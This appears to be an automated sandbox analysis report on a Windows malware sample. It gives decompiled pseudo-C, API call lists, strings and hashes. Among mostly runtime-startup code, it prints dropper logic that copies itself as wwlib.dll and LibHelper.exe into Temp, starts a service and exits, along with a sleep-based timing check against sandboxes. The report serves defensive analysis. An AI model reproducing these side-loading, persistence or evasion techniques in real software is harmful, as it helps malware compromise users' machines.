    • Instruction Fuzzy Hash: 9501D1325002057BBB125FB68C40A9B7BFFEF852A5B0A0836F704E2310DB77D4119AB4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E6D861351() {
    				long _t24;
    				void _t29;
    				void _t30;
    				void* _t33;
    				void* _t38;
    				intOrPtr _t40;
    				void* _t42;
    				void* _t50;
    				intOrPtr _t51;
    				void _t55;
    				void* _t56;
    				signed int _t58;
    
    				_t24 = GetTickCount();
    				Sleep(0x7d0); // executed
    				if(GetTickCount() - _t24 >= 0xa) {
    					 *(_t58 - 4) = 0xfffffffe;
    					_t38 =  *(_t58 - 0x4c);
    					 *(_t58 - 4) = 0;
    					_t40 =  *0x6d877880; // 0x32d9
    					 *0x6d877880 = _t40 +  *(_t38 + 4) /  *_t38;
    					_t50 = _t38;
    					_t8 = _t50 + 1; // 0x1
    					_t42 = _t8;
    					do {
    						_t29 =  *_t50;
    						_t50 = _t50 + 1;
    						_t66 = _t29;
    					} while (_t29 != 0);
    					_t51 = _t50 - _t42;
    					 *((intOrPtr*)(_t58 - 0x48)) = _t51;
    					_t10 = _t51 + 1; // 0x2
    					_push(_t10);
    					_t30 = E6D8640A6(_t66);
    					 *(_t58 - 0x50) = _t30;
    					_t55 = _t30;
    					E6D865880(_t51, _t55, 0, _t10);
    					 *(_t58 - 0x44) = _t55;
    					E6D8659E0(_t55, _t38, _t51);
    					 *(_t58 - 4) = 0xfffffffe;
    				} else {
    					 *(__ebp - 4) = 0xfffffffe;
    					__edi =  *((intOrPtr*)(__ebp - 0x48));
    				}
    				_push(8);
    				_t33 = E6D864299(_t66);
    				 *_t33 = _t55;
    				 *((intOrPtr*)(_t33 + 4)) = _t51;
    				CreateThread(0, 0, E6D8611D0, _t33, 0, 0); // executed
    				_t56 =  *(_t58 - 0x40);
    				if(_t56 != 0) {
    					FindCloseChangeNotification(_t56); // executed
    				}
    				if(_t38 != 0) {
    					UnmapViewOfFile(_t38);
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0x10));
    				return E6D864095( *(_t58 - 0x1c) ^ _t58);
    			}















    0x6d86135a
    0x6d861363
    0x6d861370
    0x6d8613aa
    0x6d8613b1
    0x6d8612f0
    0x6d8612fe
    0x6d861306
    0x6d86130c
    0x6d86130e
    0x6d86130e
    0x6d861311
    0x6d861311
    0x6d861313
    0x6d861314
    0x6d861314
    0x6d861318
    0x6d86131a
    0x6d86131d
    0x6d861320
    0x6d861321
    0x6d861326
    0x6d86132c
    0x6d86132f
    0x6d861334
    0x6d86133a
    0x6d861342
    0x6d861372
    0x6d861372
    0x6d86137f
    0x6d86137f
    0x6d861382
    0x6d861384
    0x6d86138c
    0x6d86138e
    0x6d86139f
    0x6d8613a5
    0x6d8613c1
    0x6d8613c4
    0x6d8613c4
    0x6d8613cc
    0x6d8613cf
    0x6d8613cf
    0x6d8613d8
    0x6d8613f0

    APIs
    • GetTickCount.KERNEL32 ref: 6D86135A
    • Sleep.KERNELBASE(000007D0), ref: 6D861363
    • GetTickCount.KERNEL32 ref: 6D861369
    • CreateThread.KERNELBASE(00000000,00000000,Function_000011D0,00000000,00000000,00000000), ref: 6D86139F
    • FindCloseChangeNotification.KERNELBASE(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613C4
    • UnmapViewOfFile.KERNEL32(00000000,6A907F72,00000001,00000000,00000000), ref: 6D8613CF
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CountTick$ChangeCloseCreateFileFindNotificationSleepThreadUnmapView
    • String ID:
    • API String ID: 2401965125-0
    • Opcode ID: 2f386b97df5756811f8f0f22eb67dedf36ccdf74e247c65cea9e1956a3311a9f
    • Instruction ID: 9f1984ce186830c1281abf2337fe3c011178222e1b6049bdd272f6e9b66ccce6
    • Opcode Fuzzy Hash: 2f386b97df5756811f8f0f22eb67dedf36ccdf74e247c65cea9e1956a3311a9f
    • Instruction Fuzzy Hash: 4621AE71D04664DFDB148F69C94CBADBB75FF8AB30F104659E9166B381DB312902CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E2FF116C4(intOrPtr _a4) {
    				void* __esi;
    				void* __ebp;
    				long _t4;
    				void* _t7;
    				void* _t8;
    				void* _t9;
    				intOrPtr _t10;
    
    				_t10 = 0;
    				if( *0x2ff13020 != 0) {
    					OutputDebugStringA("IsolationAware function called after IsolationAwareCleanup\n");
    				}
    				if( *0x2ff13018 != _t10) {
    					L5:
    					_t10 = 1;
    				} else {
    					_t14 =  *0x2ff13020 - _t10;
    					if( *0x2ff13020 != _t10) {
    						L4:
    						_push(_a4);
    						_push( *0x2ff13000);
    						if(E2FF11A62() == 0) {
    							goto L7;
    						} else {
    							goto L5;
    						}
    					} else {
    						_t7 = E2FF11716(_t8, _t9, _t10, _t14); // executed
    						if(_t7 == 0) {
    							L7:
    							_t4 = GetLastError();
    							__eflags = _t4 - 0x7f;
    							if(_t4 == 0x7f) {
    								L12:
    								 *0x2ff13018 = 1;
    								_t10 = 1;
    							} else {
    								__eflags = _t4 - 0x7e;
    								if(_t4 == 0x7e) {
    									goto L12;
    								} else {
    									__eflags = _t4 - 0x78;
    									if(_t4 == 0x78) {
    										goto L12;
    									}
    								}
    							}
    						} else {
    							goto L4;
    						}
    					}
    				}
    				return _t10;
    			}










    0x2ff116c8
    0x2ff116d0
    0x2ff11c38
    0x2ff11c38
    0x2ff116dc
    0x2ff11701
    0x2ff11703
    0x2ff116de
    0x2ff116de
    0x2ff116e4
    0x2ff116ef
    0x2ff116ef
    0x2ff116f2
    0x2ff116ff
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x2ff116e6
    0x2ff116e6
    0x2ff116ed
    0x2ff1170b
    0x2ff1170b
    0x2ff11c43
    0x2ff11c46
    0x2ff11c56
    0x2ff11c59
    0x2ff11c5e
    0x2ff11c48
    0x2ff11c48
    0x2ff11c4b
    0x00000000
    0x2ff11c4d
    0x2ff11c4d
    0x2ff11c50
    0x00000000
    0x00000000
    0x2ff11c50
    0x2ff11c4b
    0x00000000
    0x00000000
    0x00000000
    0x2ff116ed
    0x2ff116e4
    0x2ff11708

    APIs
    • GetLastError.KERNEL32(?,00000001,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF1170B
      • Part of subcall function 2FF11716: GetModuleFileNameW.KERNEL32(?,?,00000105,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001), ref: 2FF117D8
      • Part of subcall function 2FF11716: GetLastError.KERNEL32(00000020), ref: 2FF1183D
    • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,00000001,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001,?), ref: 2FF11C38
    Strings
    • IsolationAware function called after IsolationAwareCleanup, xrefs: 2FF11C33
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$DebugFileModuleNameOutputString
    • String ID: IsolationAware function called after IsolationAwareCleanup
    • API String ID: 3265401609-2690750368
    • Opcode ID: 54bdce36f1b61013c6e3a173b7d2c9c0d9897d0d073f6860d03fca624d10a9b4
    • Instruction ID: bd64b080485c31a5c603d6a5b41ed63ee6c58c5cfa88ce4ef7d09f85201fbb1d
    • Opcode Fuzzy Hash: 54bdce36f1b61013c6e3a173b7d2c9c0d9897d0d073f6860d03fca624d10a9b4
    • Instruction Fuzzy Hash: 3CF0B431904320BBBF654BA288449D73BEFAF066A23220137E705C1321D326D768DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 03031020: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 03031043
      • Part of subcall function 03031020: _strrchr.LIBCMT ref: 03031052
    • GetModuleFileNameA.KERNEL32(00000000,404,00000104), ref: 0303175B
    • _strrchr.LIBCMT ref: 03031764
    • lstrcpy.KERNEL32(404,404), ref: 03031776
    • lstrcat.KERNEL32(404,wwlib.dll), ref: 03031788
    • CopyFileA.KERNEL32(404,C:\Users\user\AppData\Local\Temp\edgDDEB.tmp,00000000), ref: 03031798
    • lstrcat.KERNEL32(404,LibHelper.exe), ref: 030317A0
    • CopyFileA.KERNEL32(404,C:\Users\user\AppData\Local\Temp\edgDDEC.tmp,00000000), ref: 030317AA
    • WinExec.KERNEL32(?,00000000), ref: 030318E1
    • GetCurrentProcess.KERNEL32(00000000), ref: 030318E8
    • TerminateProcess.KERNEL32(00000000), ref: 030318EF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: File$CopyModuleNameProcess_strrchrlstrcat$CurrentExecTerminatelstrcpy
    • String ID: 404$404$C:\Users\user\AppData\Local\Temp\edgDDEA.tmp$C:\Users\user\AppData\Local\Temp\edgDDEB.tmp$C:\Users\user\AppData\Local\Temp\edgDDEC.tmp$LibHelper.exe$ghka333-fagg-330fa-21-3351e$sc start "%s"$wwlib.dll
    • API String ID: 3008500518-1127021472
    • Opcode ID: b5cd246d953c8480bd18b3242ab4093a6bf36e7615b7f304f2b67ab70b426aab
    • Instruction ID: f9ddc00e0eb91c18f1decccb74188e976c18f3a634685e13f640a1b57f6659fb
    • Opcode Fuzzy Hash: b5cd246d953c8480bd18b3242ab4093a6bf36e7615b7f304f2b67ab70b426aab
    • Instruction Fuzzy Hash: 8D61F9B99032056BDF18FF74DC44AFA779DEF4B204F0846B8D945AB142DB399A0687A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E6D8640DB(_Unknown_base(*)()* __edi, void* __esi) {
    				struct HINSTANCE__* _t2;
    				void* _t4;
    				void* _t7;
    				void* _t10;
    				struct HINSTANCE__* _t14;
    
    				_t11 = __edi;
    				_push(__edi);
    				InitializeCriticalSectionAndSpinCount(0x6d8c1030, 0xfa0);
    				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
    				_t14 = _t2;
    				if(_t14 != 0) {
    					L2:
    					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
    					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
    					if(_t11 == 0 || _t4 == 0) {
    						_t4 = CreateEventW(0, 1, 0, 0);
    						 *0x6d8c102c = _t4;
    						if(_t4 != 0) {
    							goto L5;
    						} else {
    							goto L7;
    						}
    					} else {
    						 *0x6d8c1048 = _t11;
    						 *0x6d8c104c = _t4;
    						L5:
    						return _t4;
    					}
    				} else {
    					_t14 = GetModuleHandleW(L"kernel32.dll");
    					if(_t14 == 0) {
    						L7:
    						E6D864A9B(_t10, _t11, _t14, 7);
    						asm("int3");
    						DeleteCriticalSection(0x6d8c1030);
    						_t7 =  *0x6d8c102c; // 0x0
    						if(_t7 != 0) {
    							return CloseHandle(_t7);
    						}
    						return _t7;
    					} else {
    						goto L2;
    					}
    				}
    			}








    0x6d8640db
    0x6d8640dc
    0x6d8640e7
    0x6d8640f2
    0x6d8640f8
    0x6d8640fc
    0x6d86410f
    0x6d864121
    0x6d864123
    0x6d86412b
    0x6d864146
    0x6d86414c
    0x6d864153
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d864131
    0x6d864131
    0x6d864137
    0x6d86413c
    0x6d86413e
    0x6d86413e
    0x6d8640fe
    0x6d864109
    0x6d86410d
    0x6d864155
    0x6d864157
    0x6d86415c
    0x6d864162
    0x6d864168
    0x6d86416f
    0x00000000
    0x6d864172
    0x6d864178
    0x00000000
    0x00000000
    0x00000000
    0x6d86410d

    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(6D8C1030,00000FA0,?,?,6D8640B9), ref: 6D8640E7
    • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,6D8640B9), ref: 6D8640F2
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6D8640B9), ref: 6D864103
    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D864115
    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D864123
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,6D8640B9), ref: 6D864146
    • ___scrt_fastfail.LIBCMT ref: 6D864157
    • DeleteCriticalSection.KERNEL32(6D8C1030,00000007,?,?,6D8640B9), ref: 6D864162
    • CloseHandle.KERNEL32(00000000,?,?,6D8640B9), ref: 6D864172
    Strings
    • SleepConditionVariableCS, xrefs: 6D86410F
    • kernel32.dll, xrefs: 6D8640FE
    • WakeAllConditionVariable, xrefs: 6D86411B
    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 6D8640ED
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
    • API String ID: 3578986977-3242537097
    • Opcode ID: 2f561ccc20816c5f57035651c21c8da9f3ce177afc464749ad05d6e8fa16b301
    • Instruction ID: c49a5d458544414dfacdc3da7aa5c0afcff2448ab4c4558e8f41bc6498915cd3
    • Opcode Fuzzy Hash: 2f561ccc20816c5f57035651c21c8da9f3ce177afc464749ad05d6e8fa16b301
    • Instruction Fuzzy Hash: 11017C75A086A2EBDB215B7B8C5CF7E3A79AB8FB61B010815F914D6341EB31C400CAB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E2FF110F6() {
    				long _v8;
    				struct _FILETIME _v16;
    				signed int _v20;
    				union _LARGE_INTEGER _v24;
    				signed int _t13;
    				signed int _t14;
    				signed int _t15;
    				int _t23;
    				intOrPtr* _t28;
    				void _t34;
    
    				_t28 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "HeapSetInformation");
    				if(_t28 != 0) {
    					 *_t28(GetProcessHeap(), 1, 0, 0);
    				}
    				GetSystemTimeAsFileTime( &_v16);
    				_t13 = GetCurrentProcessId();
    				_t14 = GetCurrentThreadId();
    				_t15 = GetTickCount();
    				QueryPerformanceCounter( &_v24);
    				_t34 = _v16.dwHighDateTime ^ _v16.dwLowDateTime ^ _t13 ^ _t14 ^ _t15 ^ _v20 ^ _v24.LowPart;
    				VirtualProtect(0x2ff11b94, 4, 0x40,  &_v8); // executed
    				 *0x2ff11b94 = _t34;
    				if(_t34 == 0) {
    					 *0x2ff11b94 = 0xbb40e64e;
    				}
    				_t23 = VirtualProtect(0x2ff11b94, 4, _v8,  &_v8); // executed
    				 *0x2ff13004 = 0x44bf19b1;
    				return _t23;
    			}













    0x2ff11116
    0x2ff1111a
    0x2ff11129
    0x2ff11129
    0x2ff1112f
    0x2ff1113b
    0x2ff11143
    0x2ff1114b
    0x2ff11157
    0x2ff11169
    0x2ff11179
    0x2ff1117b
    0x2ff11183
    0x2ff11d36
    0x2ff11d36
    0x2ff11193
    0x2ff11197
    0x2ff111a3

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,HeapSetInformation), ref: 2FF11109
    • GetProcAddress.KERNEL32(00000000), ref: 2FF11110
    • GetProcessHeap.KERNEL32(00000001,00000000,00000000), ref: 2FF11122
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 2FF1112F
    • GetCurrentProcessId.KERNEL32 ref: 2FF1113B
    • GetCurrentThreadId.KERNEL32 ref: 2FF11143
    • GetTickCount.KERNEL32 ref: 2FF1114B
    • QueryPerformanceCounter.KERNEL32(?), ref: 2FF11157
    • VirtualProtect.KERNELBASE(2FF11B94,00000004,00000040,?), ref: 2FF11179
    • VirtualProtect.KERNELBASE(2FF11B94,00000004,?,?), ref: 2FF11193
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CurrentProcessProtectTimeVirtual$AddressCountCounterFileHandleHeapModulePerformanceProcQuerySystemThreadTick
    • String ID: HeapSetInformation$kernel32.dll
    • API String ID: 2966426798-3597996958
    • Opcode ID: 99f650068c1d7ede0108f6501e7cc6d8bf19525e57b6997306f5a7bf8a1bfaae
    • Instruction ID: 1de7169bcdae207c6817480d4b1bec05964e34c413565acc5c8f23616c139794
    • Opcode Fuzzy Hash: 99f650068c1d7ede0108f6501e7cc6d8bf19525e57b6997306f5a7bf8a1bfaae
    • Instruction Fuzzy Hash: A51121B6D00258ABF7109BF18D48B9FB7BCAF08765F530551EB01F7354D6389A148AB0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				long _t25;
    				signed int _t28;
    				int _t30;
    				signed int _t31;
    				signed int _t32;
    				int _t33;
    				signed int _t35;
    				signed int _t38;
    				long _t40;
    				void* _t50;
    				long _t54;
    				signed int _t56;
    				intOrPtr* _t57;
    				void* _t59;
    
    				_t50 = __edx;
    				E2FF110F6(); // executed
    				_push(0x58);
    				_push(0x2ff112e8);
    				E2FF11310(__ebx, __edi, __esi);
    				_t40 = 0;
    				 *(_t59 - 0x1c) = 0;
    				 *((intOrPtr*)(_t59 - 4)) = 0;
    				GetStartupInfoA(_t59 - 0x68);
    				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
    				 *((intOrPtr*)(_t59 - 4)) = 1;
    				_t54 =  *( *[fs:0x18] + 4);
    				while(1) {
    					_t25 = InterlockedCompareExchange(0x2ff13074, _t54, 0);
    					if(_t25 == 0) {
    						break;
    					}
    					__eflags = _t25 - _t54;
    					if(__eflags != 0) {
    						Sleep(0x3e8);
    						continue;
    					} else {
    						_t56 = 1;
    						_t40 = 1;
    						L4:
    						if( *0x2ff13070 == _t56) {
    							_push(0x1f);
    							L2FF123FA();
    							goto L7;
    						} else {
    							_t38 =  *0x2ff13070;
    							if(_t38 != 0) {
    								 *0x2ff13088 = _t56;
    								goto L7;
    							} else {
    								 *0x2ff13070 = _t56;
    								_push(0x2ff112e4);
    								_push(0x2ff112d8); // executed
    								L2FF11355(); // executed
    								if(_t38 != 0) {
    									 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
    									_t33 = 0xff;
    								} else {
    									L7:
    									if( *0x2ff13070 == _t56) {
    										_push(0x2ff112d4);
    										_push(0x2ff112cc);
    										L2FF11481();
    										 *0x2ff13070 = 2;
    									}
    									if(_t40 == 0) {
    										InterlockedExchange(0x2ff13074, _t40);
    									}
    									if( *0x2ff13080 != 0) {
    										_t28 = E2FF124AF(__eflags, 0x2ff13080);
    										__eflags = _t28;
    										if(_t28 != 0) {
    											 *0x2ff13080(0, 2, 0);
    										}
    									}
    									_t57 =  *_acmdln;
    									while(1) {
    										 *((intOrPtr*)(_t59 - 0x20)) = _t57;
    										_t30 =  *_t57;
    										if(_t30 <= 0x20) {
    											goto L18;
    										}
    										L14:
    										if(_t30 == 0x22) {
    											__eflags =  *(_t59 - 0x1c);
    											 *(_t59 - 0x1c) = 0 |  *(_t59 - 0x1c) == 0x00000000;
    										}
    										_t35 = _t30 & 0x000000ff;
    										__imp___ismbblead(_t35);
    										if(_t35 != 0) {
    											_t57 = _t57 + 1;
    											 *((intOrPtr*)(_t59 - 0x20)) = _t57;
    										}
    										_t57 = _t57 + 1;
    										continue;
    										L18:
    										__eflags = _t30;
    										if(_t30 != 0) {
    											__eflags =  *(_t59 - 0x1c);
    											if( *(_t59 - 0x1c) != 0) {
    												goto L14;
    											} else {
    												goto L20;
    											}
    											while(1) {
    												L20:
    												_t31 =  *_t57;
    												__eflags = _t31;
    												if(_t31 == 0) {
    													break;
    												}
    												__eflags = _t31 - 0x20;
    												if(_t31 <= 0x20) {
    													_t57 = _t57 + 1;
    													 *((intOrPtr*)(_t59 - 0x20)) = _t57;
    													continue;
    												}
    												break;
    											}
    											__eflags =  *(_t59 - 0x3c) & 0x00000001;
    											if(__eflags == 0) {
    												_t32 = 0xa;
    											} else {
    												_t32 =  *(_t59 - 0x38) & 0x0000ffff;
    											}
    											_t30 = E2FF1159F(_t40, _t50, _t57, __eflags, 0x2ff10000, 0, _t57, _t32); // executed
    											 *0x2ff13084 = _t30;
    											__eflags =  *0x2ff13050;
    											if( *0x2ff13050 == 0) {
    												exit(_t30); // executed
    												goto L14;
    											}
    											__eflags =  *0x2ff13088;
    											if( *0x2ff13088 == 0) {
    												__imp___cexit();
    											}
    											 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
    											_t33 =  *0x2ff13084;
    											goto L41;
    										}
    										goto L20;
    									}
    								}
    							}
    						}
    						L41:
    						return E2FF1153C(_t33);
    					}
    				}
    				_t56 = 1;
    				goto L4;
    			}

















    0x2ff110ec
    0x2ff110ec
    0x2ff111d3
    0x2ff111d5
    0x2ff111da
    0x2ff111df
    0x2ff111e1
    0x2ff111e4
    0x2ff111eb
    0x2ff111f1
    0x2ff111f8
    0x2ff11205
    0x2ff1120d
    0x2ff11211
    0x2ff11219
    0x00000000
    0x00000000
    0x2ff11d52
    0x2ff11d54
    0x2ff11d65
    0x00000000
    0x2ff11d56
    0x2ff11d58
    0x2ff11d59
    0x2ff11222
    0x2ff11229
    0x2ff11d70
    0x2ff11d72
    0x00000000
    0x2ff1122f
    0x2ff1122f
    0x2ff11236
    0x2ff11ba0
    0x00000000
    0x2ff1123c
    0x2ff1123c
    0x2ff11242
    0x2ff11247
    0x2ff1124c
    0x2ff11255
    0x2ff11e17
    0x2ff11e1e
    0x2ff1125b
    0x2ff1125b
    0x2ff11262
    0x2ff11264
    0x2ff11269
    0x2ff1126e
    0x2ff11275
    0x2ff11275
    0x2ff11281
    0x2ff11285
    0x2ff11285
    0x2ff11292
    0x2ff11d82
    0x2ff11d88
    0x2ff11d8a
    0x2ff11d96
    0x2ff11d96
    0x2ff11d8a
    0x2ff1129d
    0x2ff112a0
    0x2ff112a0
    0x2ff112a3
    0x2ff112a7
    0x00000000
    0x00000000
    0x2ff112ad
    0x2ff112af
    0x2ff11552
    0x2ff11558
    0x2ff11558
    0x2ff112b5
    0x2ff112b9
    0x2ff112c2
    0x2ff11dbb
    0x2ff11dbc
    0x2ff11dbc
    0x2ff112c8
    0x00000000
    0x2ff11560
    0x2ff11560
    0x2ff11562
    0x2ff11564
    0x2ff11568
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x2ff1156e
    0x2ff1156e
    0x2ff1156e
    0x2ff11570
    0x2ff11572
    0x00000000
    0x00000000
    0x2ff11574
    0x2ff11576
    0x2ff11578
    0x2ff11579
    0x00000000
    0x2ff11579
    0x00000000
    0x2ff11576
    0x2ff1157e
    0x2ff11582
    0x2ff11b9a
    0x2ff11588
    0x2ff11588
    0x2ff11588
    0x2ff11595
    0x2ff11da1
    0x2ff11da6
    0x2ff11dad
    0x2ff11db0
    0x00000000
    0x2ff11db0
    0x2ff11df3
    0x2ff11dfa
    0x2ff11dfc
    0x2ff11dfc
    0x2ff11e02
    0x2ff11e09
    0x00000000
    0x2ff11e09
    0x00000000
    0x2ff11562
    0x2ff112a0
    0x2ff11255
    0x2ff11236
    0x2ff11e23
    0x2ff11e28
    0x2ff11e28
    0x2ff11d54
    0x2ff11221
    0x00000000

    APIs
      • Part of subcall function 2FF110F6: GetModuleHandleW.KERNEL32(kernel32.dll,HeapSetInformation), ref: 2FF11109
      • Part of subcall function 2FF110F6: GetProcAddress.KERNEL32(00000000), ref: 2FF11110
      • Part of subcall function 2FF110F6: GetProcessHeap.KERNEL32(00000001,00000000,00000000), ref: 2FF11122
      • Part of subcall function 2FF110F6: GetSystemTimeAsFileTime.KERNEL32(?), ref: 2FF1112F
      • Part of subcall function 2FF110F6: GetCurrentProcessId.KERNEL32 ref: 2FF1113B
      • Part of subcall function 2FF110F6: GetCurrentThreadId.KERNEL32 ref: 2FF11143
      • Part of subcall function 2FF110F6: GetTickCount.KERNEL32 ref: 2FF1114B
      • Part of subcall function 2FF110F6: QueryPerformanceCounter.KERNEL32(?), ref: 2FF11157
      • Part of subcall function 2FF110F6: VirtualProtect.KERNELBASE(2FF11B94,00000004,00000040,?), ref: 2FF11179
      • Part of subcall function 2FF110F6: VirtualProtect.KERNELBASE(2FF11B94,00000004,?,?), ref: 2FF11193
    • GetStartupInfoA.KERNEL32(?), ref: 2FF111EB
    • InterlockedCompareExchange.KERNEL32(2FF13074,?,00000000), ref: 2FF11211
    • _initterm_e.MSVCR90 ref: 2FF1124C
    • _initterm.MSVCR90 ref: 2FF1126E
    • InterlockedExchange.KERNEL32(2FF13074,00000000), ref: 2FF11285
    • _ismbblead.MSVCR90 ref: 2FF112B9
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CurrentExchangeInterlockedProcessProtectTimeVirtual$AddressCompareCountCounterFileHandleHeapInfoModulePerformanceProcQueryStartupSystemThreadTick_initterm_initterm_e_ismbblead
    • String ID:
    • API String ID: 939867607-0
    • Opcode ID: f0aa7b6a5d5bda671bfcb528a71b547066ade51daea2ef0ba9b5776f9bdae55e
    • Instruction ID: 492abaea9ca5a31c84553508cced64e029a72084b2e8d6a19a1bbde5b73495cc
    • Opcode Fuzzy Hash: f0aa7b6a5d5bda671bfcb528a71b547066ade51daea2ef0ba9b5776f9bdae55e
    • Instruction Fuzzy Hash: 9741C131D04399EBFB148BA69844B9F77BEAF05B64F11021AE641EA3A0D7B865418F60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E2FF11716(void* __ebx, void* __edi, WCHAR* __esi, void* __eflags) {
    				intOrPtr* _t28;
    				short _t30;
    				intOrPtr* _t36;
    				long _t44;
    				short _t50;
    				void* _t53;
    
    				_t52 = __esi;
    				_t45 = __ebx;
    				_push(0x268);
    				_push(0x2ff11910);
    				E2FF1192C(__ebx, __edi, __esi);
    				_t50 = 0;
    				 *((intOrPtr*)(_t53 - 0x22c)) = 0;
    				if( *0x2ff13018 != 0 ||  *0x2ff13000 != 0xffffffff) {
    					L20:
    					_t50 = 1;
    					goto L21;
    				} else {
    					_t28 =  *0x2ff13040;
    					if(_t28 != 0) {
    						L4:
    						_push(_t50);
    						_push(8);
    						_push(_t53 - 0x238);
    						_push(1);
    						_push(_t50);
    						_t52 = 0x2ff13000;
    						_push(0x2ff13000);
    						_push(0x80000010);
    						if( *_t28() == _t50) {
    							L21:
    							return E2FF11B1D(_t45, _t50, _t52);
    						}
    						_t30 =  *(_t53 - 0x238);
    						if(_t30 != _t50) {
    							L17:
    							 *0x2ff13000 = _t30;
    							_push(_t53 - 0x22c);
    							_push(_t30);
    							if(E2FF11A62() != 0) {
    								 *((intOrPtr*)(_t53 - 4)) = _t50;
    								 *((intOrPtr*)(_t53 - 0x278)) = 0x40;
    								_push(_t53 - 0x278);
    								_t52 = L"Comctl32.dll";
    								_push(_t52);
    								_push(2);
    								_push(_t50);
    								_push(_t50);
    								if(E2FF11A97() != 0) {
    									LoadLibraryW(_t52);
